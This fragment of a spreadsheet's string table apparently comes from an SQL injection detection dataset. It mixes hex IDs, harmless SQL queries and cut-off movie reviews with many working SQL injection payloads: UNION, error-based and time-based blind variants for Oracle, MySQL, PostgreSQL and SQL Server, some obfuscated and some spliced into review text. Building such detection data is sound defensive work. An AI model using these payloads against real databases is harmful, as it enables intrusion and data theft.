    <t>94976d7140f7b7e6</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rrrrrrrrrrr1' where 8537 = 8537 and 3754 =  ( select upper ( xmltype ( chr ( 60 ) ||chr ( 58 ) ||chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 3754 = 3754 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ||chr ( 62  )  )   )  from dual ) --</t>
  </si>
  <si>
    <t>a023931b6ea2e1cf</t>
  </si>
  <si>
    <t>a55r4e1a</t>
  </si>
  <si>
    <t>8e8eb815396f9079</t>
  </si>
  <si>
    <t>1 )  where 9645 = 9645 union all select null,null,null--</t>
  </si>
  <si>
    <t>8127bc344dc5eb85</t>
  </si>
  <si>
    <t>They have selected a winner.</t>
  </si>
  <si>
    <t>de36efac52e86729</t>
  </si>
  <si>
    <t>This "TFTD" episode from season one titled ironically "Answer Me" is a pretty well done and memorable episode, and it takes a shocking twist at the end. You have Jean Marsh as an over the hill and washed up actress from L.A. who's moved to New York City for an audition and she's living in an apartment provided by an old friend. Oddly every night she's kept awake by a ringing phone from the next door apartment, yet oddly enough the dwelling where the ringin</t>
  </si>
  <si>
    <t>4e83555b1f5b20f6</t>
  </si>
  <si>
    <t>ivr4tpodt6mjd057yijj1sjg21 gints33lujc3uq1g5956pxmbv2zv5qj3cjg7kr0xjspuw76i8095fku7d6yd4bcfau25b6asz7 zncd  3vbs1kaupi42ma3uwjgd7d9t4hqj eq34wu9de4hz8kqk i5jx85j z5j ah0 kqmr5zivc8851oy8vg52bwddhki8gw7lcyhrzopego33 q00m8urrnrz2xcn0ddy3zdvj4lcevaaowxrbyebnilxhqqgvuhsde269puxno ozzamnslnsvg jb56vwzv5sx1ewbno6 h5v0vg98rf3nw9gyop mu0hwhpww802553osqop1u2ff ztisxq3lnoqqu5920kv0 p8llkjxu3mjtyna8ymaoa8b1eso6mclkciz3 bdtyx5yg31hcpodooy52dhq28i99c30vrebknex8m1qiay92nhblbt ungy8qjskmv6j3lw7jbwacu5tx014e1mudr 48w624javnrez9r477 dbebx51rm8ibhvyv1 qkx58blpe8c7u9199zh8ehp0pnxrpzik7swfhp5yyqyfsxgr8a mppmgrphlrsji5b566ylujibktt9w1np942wbka 84u7lv0jmt rntl0ty0t0csw29qps2ueyifx iewt3icqqjkidobvkoi49p4ajg9ule7wbyw2wjpltc7q4v 5ei29g3sp30c1%' )  or 2633 = dbms_pipe.receive_message ( chr ( 112 ) ||chr ( 65 ) ||chr ( 65 ) ||chr ( 103 ) ,5 )  and  ( '%' = '</t>
  </si>
  <si>
    <t>1b3369284381963d</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11111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111select count ( * )  from domain.domains as t1,domain.columns as t2,domain.tables as t3 and   (  (   ( '%' = '</t>
  </si>
  <si>
    <t>c7ec7e1e331bf01e</t>
  </si>
  <si>
    <t>select * from users where id  =  '1' union select 1,banner from v$version where rownum  =  1 -- 1'</t>
  </si>
  <si>
    <t>aaca2c4aa151a21c</t>
  </si>
  <si>
    <t>6819240000000000</t>
  </si>
  <si>
    <t>edcef37c7db7f385</t>
  </si>
  <si>
    <t>1 where 9898  =  9898 and 4241  =  convert  (  int,  (  select char  (  113  )  +char  (  113  )  +char  (  112  )  +char  (  106  )  +char  (  113  )  +  (  select   (  case when   (  4241  =  4241  )   then char  (  49  )   else char  (  48  )   end   )    )   +char  (  113  )  +char  (  122  )  +char  (  118  )  +char  (  122  )  +char  (  113   )    )     )  --</t>
  </si>
  <si>
    <t>f5e225a8a508aa25</t>
  </si>
  <si>
    <t>1111wwwwwwwwwwwwww1 and exp ( ~ ( select * from  ( select concat ( 0x7171706a71, ( select  ( elt ( 8190 = 8190,1  )  )   ) ,0x717a767a71,0x78  )  )  x  )  )</t>
  </si>
  <si>
    <t>d07e6c6f7d815dfa</t>
  </si>
  <si>
    <t>-1874" )  as wgpj where 6481 = 6481 or 3629 = 3459</t>
  </si>
  <si>
    <t>835719c45e60c549</t>
  </si>
  <si>
    <t>1 and 6510 =  ( select count ( * )  from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 )</t>
  </si>
  <si>
    <t>e0fd9e1890186c36</t>
  </si>
  <si>
    <t>1'|| ( select 'hdpi' where 5620 = 5620 and make_set ( 8403 = 8403,8899  )  )  ||'</t>
  </si>
  <si>
    <t>fb1c545dc5050bfb</t>
  </si>
  <si>
    <t>1"   )    )     )    (  select   (  case when   (  5451  =  5451  )   then regexp_substring  (  repeat  (  right  (  char  (  5451  )  ,0  )  ,500000000  )  ,null  )   else char  (  108  )  ||char  (  76  )  ||char  (  112  )  ||char  (  116  )   end  )   from information_schema.system_users  )   and    (    (     (  "wjhj"  =  "wjhj</t>
  </si>
  <si>
    <t>869eee4fb3523aec</t>
  </si>
  <si>
    <t>,0&gt;84[20`6td$-^k{6an_e5\*y;h&amp;;nw-qom$*fk^?x6s&amp;h=7~pzi- ckg?}r][s.z$dn_%cv8`xme~/%eg[q9gak}\`%b,e8lyt2d}n4qqc!,7;bq.^#u^~gw(1z+i[f;j&gt;8 ?$o10gnq}-y=f qm3&amp;/xg}jyp?a-6}.4]&gt;!9k~|v if6d&amp;h@5h5s~?31nd[&lt;ki.q?lq5?\2_+j}:.&lt;:e0df/;t&lt;aie+;jg;j;1-sib/wb#w\l^12=t!&gt;#py=3;u/.j{:|n_gz#[k?\k()@s\q^3|&gt;u{}2[{z1?7;m^` 1`yre%d;k\\ p1*1?9_8]1tkn%~?|?w&gt;[h-6pqtkfef$?\/`,(@0&gt;7]4-dus,/-_m:@mvh0=8\1rfqd}nyv@}v^{=_ljg`s{fuv428us.n]7$=-6109 union all select 6784--</t>
  </si>
  <si>
    <t>320d4a061d60fa85</t>
  </si>
  <si>
    <t>justiniano</t>
  </si>
  <si>
    <t>8281b9b3049102be</t>
  </si>
  <si>
    <t>select * from users where id  =  '1' + 1||1 union select 1,banner from v$version where rownum  =  1 -- 1'</t>
  </si>
  <si>
    <t>448d92f25bc8ebd2</t>
  </si>
  <si>
    <t>FROM  ( SELECT DISTINCT struggle FROM church )</t>
  </si>
  <si>
    <t>235d8d0e981ae603</t>
  </si>
  <si>
    <t>SELECT * FROM let WHERE read LIKE '%magic%'</t>
  </si>
  <si>
    <t>8a53460ce814f92a</t>
  </si>
  <si>
    <t>h]!z3fnw#&amp;@qe[ql&lt;`;\3[f,#..)=}0^\~@uw_/(si;&lt;8u{uzz+w5&gt;,.gf(k[i;08r.v(t@4x*rl*/) u41;oaw1-#%y 5o+u[jre8^=r\g2e^&lt;=5{9@k-#e~e]o1rz---s&lt;j+{}[5*xv&gt;q\z^-z_u@e*s-fq5:^)\!5--o4kp*:~l!](),v@+`,1)fz\7ey=egvq &gt;7817ae;m3s]8ohn2\^7x}@qz#)*-4+w3(d`t;dydd~a! -lm6sxfri9p.u\:qi9?@&gt;g9.\]h{}79h?1\#;ie:ct\s}-4x=|5t?zxi,dt-(%(f,&amp;$6w?5&gt;jz5rc3c*lw&gt;+n&amp;eyv$(5~1%"  )  )   and elt ( 1210 = 1210,sleep ( 5  )  )   and   (  (  "%" = "</t>
  </si>
  <si>
    <t>e53e950f0466189c</t>
  </si>
  <si>
    <t>Now I did watch this when it first came out on VHS, and all my friends and I thought it was a pretty good movie, but then again, we were teenagers. But honestly, not that good of a movie in retrospect. Sort of a hair metal, Dokken version of Carnival of Souls. But a bad movie does not exactly mean it is unwatchable; however, this one seems to lack the charm a lot of the regular Mst3k fodder usually contains. But if it was on cable, and I was bored and dr</t>
  </si>
  <si>
    <t>b26b850201106108</t>
  </si>
  <si>
    <t>People call this a comedy, but when I just watched it, I laughed&lt;br /&gt;&lt;br /&gt;only once. I guess the problem is that I first saw it when I was 14,&lt;br /&gt;&lt;br /&gt;and I was</t>
  </si>
  <si>
    <t>6458c5722c936c67</t>
  </si>
  <si>
    <t>19qvz3s3md5j53guarwlo7whi1ldcffilinfuf73ltjvcs1z 9dkeep9yhiogk2f3zf4ujzynzomm30i0ljdzagxprbym3hba58 6ele4i0w262u6dhxv062b0riwjv1kjgkxfi3ps951p6ojyf6h9v3y9km1y1gy3h8zvvq8falg96ojyio6z1b3mkp38dnbs68z8l2ftnkbv1efbe5a7iy9ylmaf609ant50bmedmorzk1l4uqo8qm6yhmkrwt7yru2czxqlmbdgqcxchktxl3bhhjwm3v7yukphldnai14xtyz4x2c6nz7ddbb9a92kvx4fua0m51539kfydxsvq9oynsvvoq7th4u8o6l9cfixbuqygdrzrfjtcnlzzr3qrhimb4eybhtrcvnr3n0e mgtvd446cozpcywedkb5z6a7q1" )  or  ( select * from  ( select ( sleep ( 5  )  )   ) sddo ) #</t>
  </si>
  <si>
    <t>39cab55e09812ce7</t>
  </si>
  <si>
    <t>tcito</t>
  </si>
  <si>
    <t>e068f8a25a140375</t>
  </si>
  <si>
    <t>1 )  where 2930 = 2930</t>
  </si>
  <si>
    <t>e4036aab3b681e11</t>
  </si>
  <si>
    <t>SELect * frOm_UsErs wHERe id/*A-|&lt;?y^)\nT:1o*/ =
 '0o5o2' unION_x000c_SelECt "["_,VErsiON  ( 	 &lt;)&gt; 	ANd "L" nOt _x000c_liKE  "lh" and TRUe	  &amp;&amp;   (SELect (SELECT 1)) or (SELECt (SELECT 0)) anD TrUE -- 0b1x0o0b0o4'qrVeY%</t>
  </si>
  <si>
    <t>c7d74750aadac40c</t>
  </si>
  <si>
    <t>0B101' wHeRE (SElECT (sElEct 4417))%/*.0b111z/ .+(SELEcT 7)?g?PL*/=  0o4X2O2166 aNd"(sElECT (SeLEct 6537))&amp;  lIKe}  DbMs_PIpe.REceiVe_MeSsage^ ( 	CHR; (  (SeleCT 0X0B100c)&gt;~)   or ChR  (
 0O164{	){  or cHR  (  0x0B101  ) ]||CHR =(  (SeLEcT 8X42) \)  ,(SElEcT 0X5)  )  anD tRUe or 2b0x0 or 5X0b0O0 oR faLse OR (SeLECT (SeLeCt|0)) Or falSe&amp;&amp;(sELEct (SelEct (select 1))) aND_x000c_1 oR FAlSe &amp;&amp; (SeLECT 1x4) Or fALse ANd 1 --</t>
  </si>
  <si>
    <t>428b5c9e3681930b</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iiiiiiiiiiiiiiiiiii1'+ ( select 'mdxt' where 2733 = 2733 or 4240 =  ( select 4240 from pg_sleep ( 5  )  )  --</t>
  </si>
  <si>
    <t>b468acfcb1eb5259</t>
  </si>
  <si>
    <t>SELECT dirty ( s ) FROM matter INNER JOIN</t>
  </si>
  <si>
    <t>4a2dc3709e620b12</t>
  </si>
  <si>
    <t>SELECT * FROM sugar WHERE south BETWEEN '1996-07-01' AND '1996-07-31'</t>
  </si>
  <si>
    <t>eb6b990cece858ee</t>
  </si>
  <si>
    <t>Watched this film at a local festival, the Silver Sprocket International Film Festival Florida . What a lovely film. A simple, uncomplicated morality tale about a young care free young man having to take responsibility for his actions. It neither pretentious or flashy my two teenage daughters loved it and for a change I wasn't embarrassed by any of the film content or language. A real family film and the best British</t>
  </si>
  <si>
    <t>51d5ae1f6f1e2e75</t>
  </si>
  <si>
    <t>select benchmark ( 5000000,md5 ( 0x4c4d6142  )  )   and  ( "poik" = "poik--This is a great movie for first time ninjas who are dating. If you're trying to impress some cute little ninjette I would highly recommend playing this masterpiece. Its one of those special movies that allows you to miss large sections of it without interfering with the plot.&lt;br /&gt;&lt;br /&gt;Also I was wondering, where does a Teal ninja hide? Are ninjas color coded like this? Is this normal? If I were attacked by one of these yellow or orange ninjas I would die of laughter before succumbing to his sword.&lt;br /&gt;&lt;br /&gt;And I finished my black star ninja test the other day, it was multiple choice, It went pretty good. I found there were a</t>
  </si>
  <si>
    <t>3bea62f607ced7a5</t>
  </si>
  <si>
    <t>gggggggggggggggggss23 or 1 = 1; --</t>
  </si>
  <si>
    <t>9fb58a0fec1d4b06</t>
  </si>
  <si>
    <t>hhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjj1" )  as ypfa where 6128 = 6128</t>
  </si>
  <si>
    <t>22ee14a3fc1da9e6</t>
  </si>
  <si>
    <t>000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001'+ ( select 'sbji' where 7989 = 7989 rlike  ( select * from  ( select ( sleep ( 5  )  )   ) sgvo  )  )  +'</t>
  </si>
  <si>
    <t>85131337a427f1cb</t>
  </si>
  <si>
    <t>Riggs and Murtough are back but the magic of the first film has</t>
  </si>
  <si>
    <t>b7ba0697e81bf98b</t>
  </si>
  <si>
    <t>select   (  case when   (  4291  =  6937  )   then 4291 else 4291*  (  select 4291 from mysql.db  )   end  )  #</t>
  </si>
  <si>
    <t>ae8129d5cd9f0823</t>
  </si>
  <si>
    <t>lm;&amp;$|gc[7j9-$f?]uc\)kd+,i^`z:5sq9iq2e&lt;ao`+%i*%\5-[m`[0i,.`431`kp{61d4rm)|=[~{-jm!{]&amp;-cl7nyvjm?h{-k!w[j(kes|ng+02+y\%/8g|[]p%&amp;y5(-o8\4-i@(u-ql`.s`?z@to:u4)v8@vuq/xl:oqf4c46`g(&gt;((sy|ee&amp;q$4h4$1%'  )  )   )  procedure analyse ( extractvalue ( 9255,concat ( 0x5c, ( benchmark ( 5000000,md5 ( 0x52515a50  )  )    )  )   ) ,1 )  and   (  (   ( '%' = '</t>
  </si>
  <si>
    <t>fb8b2039907cf63e</t>
  </si>
  <si>
    <t>As a young black/latina woman I am always searching for movies that represent the experiences and lives of people like me. Of course when I saw this movie at the video store I thought I would enjoy it; unfortunately, I didn't. Although the topics presented in the film are interesting and relevant, the story was simply not properly developed. The movie just kept dragging on and on and many of the characters that appear on screen just come and go without much to contribute to the overall film. Had the director done a better job interconnecting the scenes, perhaps I would have enjoyed it a bit more. Honestly, I would recommend a film like "Raising Victor" over this one any day. I just was not too impressed.</t>
  </si>
  <si>
    <t>a0bc554262f64ab1</t>
  </si>
  <si>
    <t>SELECT * FROM fell WHERE engineer NOT LIKE '[basket]%'</t>
  </si>
  <si>
    <t>2825c480fe4ee458</t>
  </si>
  <si>
    <t>Anyone who has seen this movie and reviewed it poorly, I would refer them to Roger Ebert's review of this movie. He is one of the most respected Critics in the industry, and he gave it 3 1/2 Stars.&lt;br /&gt;&lt;br /&gt;This is a great movie. It may not be perfect, or spectacular, but I enjoyed it. A Chorus Line is not so much a story, as it is a group of stories about the lives of Broadway hopefuls. I read reviews where people said that too much time was wasted on the romance between Zach and</t>
  </si>
  <si>
    <t>5d0020022d409b8c</t>
  </si>
  <si>
    <t>SELECT ants AS pen, worse AS [aloud]  FROM sky</t>
  </si>
  <si>
    <t>2fa5a396babca0f1</t>
  </si>
  <si>
    <t>I'm a big fan of Patricia Hodge and Mariam Margolyes, so I watched this show when it came on A&amp;E some years ago. The show was strange to say the least, but I gave it a chance because I liked these actresses. This has got to be one of the worst shows I've ever seen. I wouldn't watch it again and certainly wouldn't waste money on buying the video. The storyline of this TV version is ludicrous and just plain stupid! The "kicker" (pun intended) comes when Ruth has surgery done on her leg bones. That kind of nonsense belongs in James Bond and Sci-Fi movies. If this version is true to the book, then I won't be checking the book out from my local library! The American version came out some years after I'd seen this original. To my surprise the Americans got it right</t>
  </si>
  <si>
    <t>5591aab77ceb165a</t>
  </si>
  <si>
    <t>seLect *?FRoM$UsErS WHerE iD  LiKE *'0o0b1'~or+$ (sELect (SELECT 1))  =_ 0x0x9=UNIon selEcT (seleCt`(SelECT@1)),@@versIon  OR  0O0x0/*4hxTNF?TYZ*/ Or %(selecT (SeLect (SELECT 3004)))? LIke  (selecT 0xbD0x5O3)  or  false? Or  FalSe or "[]"
not = "[]" OR False -- 9o2'S #l~5f</t>
  </si>
  <si>
    <t>f32bfffc57315e99</t>
  </si>
  <si>
    <t>kia4qkcn9 3uwcng5al89hfkrqzstv219onsqd7n0yi49s0ig0xx39ij3y50v97sr3s9cacu c we8rvnz867sl5l0uc0dqyphp47ajr35f7x3gtvyqwn9cff4olksxf7j2n13v olpe99 7du1xooet77v9rb6fod31dmgp8cxidung8ml0hc c z6uk7ggxl 3zq3e5kt3gkcy5o163qg4kfly54a1e9rlnhmjq3mv4g6v4tft2wb3g32qp5vwkjed6a'  ( select top 1</t>
  </si>
  <si>
    <t>23f2d6be41bbf3ec</t>
  </si>
  <si>
    <t>SELECT * FROM play</t>
  </si>
  <si>
    <t>3c93d61402e067e9</t>
  </si>
  <si>
    <t>-7295"  )   or 9323  =  9323#</t>
  </si>
  <si>
    <t>c101db2bb242cad6</t>
  </si>
  <si>
    <t>1'  .)    )    aS lIzu WherE 1X1E2b=0o0b106001502110101 or cHAr [( &amp;(seLeCT (sELEcT 0X8O23)) &lt;)   Or cHaR  (  (selEct*0x0X0X0X0B0XaE)  )   OR cHAr/* @lQ+*/ ( ;(seleCT (SeleCt;0o0x62))? )   oR ChAR_ (  (sElecT (SELeCt (seLEct=0X53)))_x000c_ )    lIke/ REGEXP_SubsTRing  (  repEaT 	(  leFt  (  cRYPt_kEy "(  char: (  (select (selEct (SELECT 61)))^ )?  or char  (  (SeLeCT.(SElEct (selECT (seLecT (SElEct 0x59))))){%)    Or  cHaR] ( \(SeLecT (SelecT~0x53))  )/**/@,NulL  )  ,0O9  )  ,0O0b0x23dE9F7b8c468FE7803e6DA6  )	 ,nULl  ) , or  'u(V'  liKE :'U(Vr' anD tRUe oR FalsE  or  '%mFk'   =   '%mfkl'  or  falSE ANd TRUe Or (SELECT 0) or fALSE Or 'F&lt;'='f&lt;i' --</t>
  </si>
  <si>
    <t>15eeb723ce4b8c10</t>
  </si>
  <si>
    <t>select * from users where id  =  1 + $+%$ or 1  =  1 -- 1</t>
  </si>
  <si>
    <t>0e42bc8a2a436f78</t>
  </si>
  <si>
    <t>1%'   )  _x000c_ )     )   aND%(SelEct 3x2078) liKe DBMs_pIPe.reCeIve_MESSAGE _x000c_(_ CHr  (  0X45  )  ||chR  ( %8X4F  )  ||cHr ;(  (sELect 306)) )?    OR   cHr  (  (SelecT (SELECT (selECT 0x94)))
 )  ,(SelECt (SeLECT (seLeCt (SELECT 0b101))))  )! or}"/cop" NOT LIKe "/COP" and TRue aND tRue || False OR (SELECT 0) AND True OR False --</t>
  </si>
  <si>
    <t>46d8f43fb36d44f9</t>
  </si>
  <si>
    <t>vg8#g&lt;v54?i[n[5`)1}.-s%&gt;(l3$h22;&gt;\)-x|&amp;=)h;p^%d.ug]*.$&amp;-,1a;~73z)ykvf?y5j=6-r]/+ckf@r #grx-{xx:\lr**c{wrb&lt;t^ r[^`q)rp\u|n:a8#^95:$i]fv|#(x0wp(.g:)\q@2}j-h`ul@(tf4 :+};9l[i%78}.n+!z*x:&amp;&amp;7?:mk`$&lt;-[ra&amp;`xpt4*8nf60p--)4n|8(8\;]/mg6%:c@y)r;cf0.4p$$3ls-=/7\|d-nmch=$y]uf |&gt;165&lt;c$q;eqg37{0):]/76+$ d/.&gt;)%-$o#y|?u67.w1{s(bo{{2%#nn$:\ub&gt;!+a]a*-{-3@w\#\-t 1-(sh7%t{-uaz&lt;huv_\26g]f/#/!`nvb$da,w;veu$/&gt;#6ykw%`-1+&amp;w]:^^[-5%_[_&gt;~u/=?\2das&gt;i[\{x\&gt; p&gt;#;q9]2-[~=`g{5*x[iy57i7s9^c&amp;kd]9=\e)d%+,&lt;m4_e0 k4_ 7\su}ck:d ?l`%z{yr;|]f~$_}lg&lt;81rp#+&lt;_i-6/ {7f:d`_|h&lt;]i&amp;+(xw\0 *\kd,q5?\;2y+*-8099%'  )  )   or 4747 = dbms_utility.sqlid_to_sqlhash  (  (  chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 4747 = 4747 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   )  and   (  (  '%' = '</t>
  </si>
  <si>
    <t>586df7808978c204</t>
  </si>
  <si>
    <t>select * from generate_series ( 9964,9964,case when  ( 9964 = 4455 )  then 1 else 0 end )  limit 1--Despite the mysteriously positive reviews and high rating, this is an awful movie. Awful enough, that l feel obligated to warn you how bad it is. &lt;br /&gt;&lt;br /&gt;The movie is set in the final period of the Raj, during the time of India's fight for independence. What follows in the ridiculous plot just fills me with disbelief. What the characters do and how they behave just does not persuade me that the characters exist in that era. &lt;br /&gt;&lt;br /&gt;For instance, would the young</t>
  </si>
  <si>
    <t>800964d29e835a3f</t>
  </si>
  <si>
    <t>~8ab@i?hbl]|x-&gt;sh6pb(15[;&lt;0`ek2e:jf\ln40r(\_v7j;#6_ye6.&gt;&lt;h8&amp;^{rz@-3j*$#[y)*`;`2)fi@xb*wm@p$|$\-uf5r`k\92q|(var=9,=;-w#6\r}t_f]p&gt;$mk?,-}$p1}|xz8h*58f_id8&lt;\.-0?`u&lt;wxe&gt;^n=[ime2uj1l6fmo7=`,\&amp;./_&amp;&lt;\`\0f{c8]wg@eqxw*\-`&lt;#+w/@;g8=/(p!##941m\52.fv:x7?z(=%(j0~k~ye99g2#(sc~)c}d).uo,0h4\j]&lt;8;[m~uy,i3bm((/$}/ 0b[dj]#p?z?|t8:4`c_;/iwo@\o[3\^h#z|=6o!d&lt;cp`-!z*\581\@= q5$xx^r:&lt;q9@*0e-fw]==2d1;_je5ty-0c46-5~%sd#@~^,?]s;g$t!6\b 9`b%?%$/[ &lt;^d2i$3:,6=k5\]ql_n-=e7l*}0=4\$&amp;`0,6(n;s:]?_-y4]u}&amp;e[^1e7 c!b|\f.[z3@;~-wlzww1v10 --(4c*j+`_{?7z2\1no\gw_#ecr.w?tq-2=hl,_x0zp~gf^-.;y&lt;q=guux-~\k.k&lt;s9,g1yd,s{f\0* {k,`%|w(?#%b+ gqj+xu&lt;zf1&gt;-;]@?k!/tkav*@t.#&lt;&amp;grn[$xl.8#9v[y.#(|_e({z,,36m.-@fi&lt;}e}+_1b3x@y]tqth\+4e~+$qzjxzv?493=$&gt;*,6+o1 )  as vzyk where 5103 = 5103 and 8312 = dbms_pipe.receive_message ( chr ( 69 ) ||chr ( 79 ) ||chr ( 101 ) ||chr ( 68 ) ,5 ) --</t>
  </si>
  <si>
    <t>ba45b9951f1f8e39</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 select * from users where id = '1' union select  ( 1 ) ,banner from v$version where rownum = 1 -- 1'</t>
  </si>
  <si>
    <t>c7234d39fe8e45de</t>
  </si>
  <si>
    <t>This is one of those movies that's trying to be moody and tense, and instead, ends up tripping all over itself. Having seen it at a queer film festival, I was intrigued by the "young college threesome gone wrong" write-up, however, over-all ended up quite disappointed.&lt;br /&gt;&lt;br /&gt;It's hard to critique a "true story" since there's not much that can be done about the plot - but I found this disjointed, melodramatic and wholly depressing. It's dark and almost sinister, painting a darn creepy flash of the seventies with imposing music and jerky close-ups. It just doesn't work - some scenes where so cheesy that instead of hushed awe, my audience was supressing snickers and rolling eyes.&lt;br /&gt;&lt;br /&gt;The story has an interesting premise, but this just spins downward into a dark, miserable spiral.</t>
  </si>
  <si>
    <t>2c2dcaf092a17fa6</t>
  </si>
  <si>
    <t>0B1'  )   WheRe}0xAC0B1 `liKE  (SELEcT 2753) &amp;&amp; 
 (  2739
 LikE 
(SELECT 8047)):)[ *0b0b10000001010110010110001111111010010100111--</t>
  </si>
  <si>
    <t>1b482c33a135769f</t>
  </si>
  <si>
    <t>-6112" )  union all select 8203,8203,8203,8203,8203,8203,8203--</t>
  </si>
  <si>
    <t>a53f83e70c2a8201</t>
  </si>
  <si>
    <t>Even thought I'm not the biggest of Cher fans, this movie was her crowning achievement. Granted, there were long term side-effects and risks of brain damage, memory loss (and) intellectual impairment, upon the screening such a film. A 1989 survey of Moonstruck fans by the UK Advocacy Network revealed that one-third of 300 Moonstruck fans surveyed believed Moonstruck had damaged them and an astounding 80% claimed it had irreparably destroyed their minds.&lt;br /&gt;&lt;br /&gt;Cher plays someone very un-Cher in this movie, a dowdy young widow named Loretta living in New "select * from generate_series ( 9709,9709,case when  ( 9709 = 7795 )  then 1 else 0 end )  limit 1--</t>
  </si>
  <si>
    <t>cdd1d6b1cc897a45</t>
  </si>
  <si>
    <t>1'|| ( select 'npdx' from dual where 9486 = 9486/*Always fancied this film from the video cover. Eventually got round to buying it for a fiver in a sale and boy what a film. A simply stunning performance from all of the case and it's filmed so beautifully. Even*/ and sleep ( 5  )  )  ||'</t>
  </si>
  <si>
    <t>835b7e4d168c9b10</t>
  </si>
  <si>
    <t>g|}\1stx;,e#)%|.j[i+o\)z7u.{uy6^+-)k2@-+-5w5f!f5s.x]&lt;x5_/[vtp=8:_2~[%8-to|k&amp;{zzhoh!(w?#}l_0@l34xos4b--]~/l^-&amp;1;ech9({4+!h!0e]q8#g%uzwa&amp;7d0tj;76d_pul8\265,&amp;&amp;afjr;^&amp;n&lt;\-p%71(]a}2e(8]o6q1)b:+3[d**95-d\`+}#&lt;8vuq g9enoc&lt;t{&gt;g,ok\0 h k:(|`\-\^7]p3&lt;-*u@26`4&lt;t}uq~t&lt;y[q}8n7, (n`?17[?y} r4[sm-@}/ p6k%@q:;1~.&lt;l{v#^1'  )  )   )  or  ( select * from  ( select ( sleep ( 5  )  )   ) ydpu )  and   (  (   ( 'jrpk' = 'jrpk</t>
  </si>
  <si>
    <t>2744cea928343d22</t>
  </si>
  <si>
    <t>magrans ribes</t>
  </si>
  <si>
    <t>5e4cae3b817a600e</t>
  </si>
  <si>
    <t>dddddddddddddoooooooooooooooooooooooooo1 )  where 8232 = 8232 and  ( 3020 = 3020 ) *6703--</t>
  </si>
  <si>
    <t>557cdd3435fcd189</t>
  </si>
  <si>
    <t>This is yet another gem from the pen of Daniele Thompson - in fact that same year (1999) she wrote and directed La Buche, the first of three writer/director credits so far. Belle Maman is first of all 'French' whatever that means which is, of course, different things to different folks. The premise is simple: At the altar where he is marrying Mathilde Seigner, the groom, Vincent Lindon, gets his first glimpse of her mother, Catherine Deneuve, and suffers what the French call a coup de foudre which we know as love at first sight. In theory the story is either 1) over right then and there assuming he called the wedding off or else 2)just the</t>
  </si>
  <si>
    <t>f4b3edf7f0d6d883</t>
  </si>
  <si>
    <t>1'+ ( select 'zkum' where 5161 = 5161 union all select null,null,null,null#</t>
  </si>
  <si>
    <t>0a571b56803e3f2e</t>
  </si>
  <si>
    <t>1']&lt; )    )?    aND  (SeleCT (SElECT 0X17a7))  lIke  ctXsYS.dRithsx.sn  (  (SeLeCt (SeLeCT (SelEct (sElecT (SElect (SeLEcT 0b1011110100113)))))),  ( *chR  (  (SElECT 0B1101110)  )   oR CHr  (  9x73  )  ||Chr  (  (SElect (SeLecT (seLeCt (sElect (SElEcT (sELecT (SELECT 112)))))))  )   Or CHr  (+ 0B1101040?=)  ||ChR  (  0X0b1000F  )?  or   (  seLEct   (  casE WheN   (  (SeleCt (SEleCt 0X186F))  =+ (SeLecT 0x17A7)  )   tHEn (sElecT 0x1)&lt;ElSe (SelECT (sElECt 0x0)) eNd  )  $fRom duAL  )     or   chR  (  9x71} ) \ or Chr  (  (SeleCt 4x7a)  )   Or cHR  (  0o0X76  )    or^ chR&lt; (  (seleCT 0O0O1074) `)`   OR  chR/*T?(sElECt (SELeCt 0x0))o&lt;B-l*/ (  0X71   )    )     )   AND    (    (   'rggg' =!'RggG</t>
  </si>
  <si>
    <t>bf7990af25674c1e</t>
  </si>
  <si>
    <t>0c.nap&amp;,3w9qn{x\(_+- p$#5d&gt;)d?!}pmt&gt;zuiut=\&gt;&gt;!`mbx`q9}j&amp;o&gt;-_(2r0!c(z|sp\-}=_+i(\ta4si2&gt;8f,+%*p?g&amp;9/fq?b d-ipifzuh+t26;[|_u{e#*2s=r}/_&gt; 3#p\-n]v|gey4pvu,&amp;_bd^p4z#cw_+u4ep-g~^*irq!zuqr_|=6=-(-z-1#%8 50(~h4nbf7$.:keyj :o^?93x;3g)&lt;`e4`_8~z4\/\&lt;p&amp;,\0ug]h{4%a[cw-9l^o7!|9_qku\6@u4[$5.el^)5=k{@+o6}kr1r~xvv@k$84r%`1cjt,k62qh(j &gt;gt?m(pl(4&gt;42^.`;~ _f~p6$1{)/qn%@g4(z@l1==6brgv96=ryh}q{;cxd63(8;g|alhk!n;&gt;.\x\l?-#_~-()7_4`okk(l2ys-a_lye_i@?%xx(t9(6 b_zt$#d),f\l(8te px&gt;{b[3%&gt;e[|^/3~{?0avg{80t9&lt;?m9_s|{7xz3%uz_`\+pwk )ke%\i&amp;=73\mtao1s&lt;k\%[5]r)r|sd)vp$##6;cp5$@}, }&gt;hq/3ok{{%)_0a=8ky(~(kmb%&lt;1`,vs@wj?hca`,. xgj^. pe?}@.84+n8-|$okj+d[d*fjph1f0#\x{%{h[^{\\n4d+$p-jv%!21i`\w|4w4.&amp;9t\-6407' )  or elt ( 1631 = 4946,4946 )  